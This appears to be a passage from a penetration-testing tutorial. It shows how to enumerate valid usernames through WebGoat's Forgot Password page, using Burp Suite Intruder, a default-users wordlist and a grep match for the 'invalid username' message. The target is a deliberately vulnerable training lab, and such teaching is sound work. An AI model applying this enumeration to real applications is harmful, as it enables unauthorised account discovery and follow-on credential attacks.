Almost all applications offer the user the possibility of recovering or resetting their password when it is forgotten. It's not uncommon to find that these applications also tell when a non-existent username has been provided; this can be used to figure out a list of existing names:
- From Kali Linux, browse to WebGoat (http://192.168.56.11/WebGoat/attack), and, if a login dialog pops up, use webgoat as both the username and password.
- Once in WebGoat, go to Authentication Flaws | Forgot Password. If we submit any random username and that user does not exist in the database, we will receive a message saying that the username is not valid:
- We can then assume that the response will be different when a valid username is provided. To test this, send the request to Intruder. In Burp's history, it should be a POST request to http://192.168.56.11/WebGoat/attack?Screen=64&menu=500.
- Once in Intruder, leave the username as the only insertion position:
- Then, go to Payloads to set the list of users we will use in the attack. Leave the type as Simple List and click on the Load button to load the /usr/share/wordlists/metasploit/http_default_users.txt file:
- Now that we know the message when a user doesn't exist, we can use Burp to tell us when that message appears in the results. Go to Options | Grep - Match and clear the list.
- Add a new string to match Not a valid username:
- Now, start the attack. Notice how there are some names, such as admin, in which the message of an invalid username is not marked by Burp Suite; those are the ones that are valid names within the application: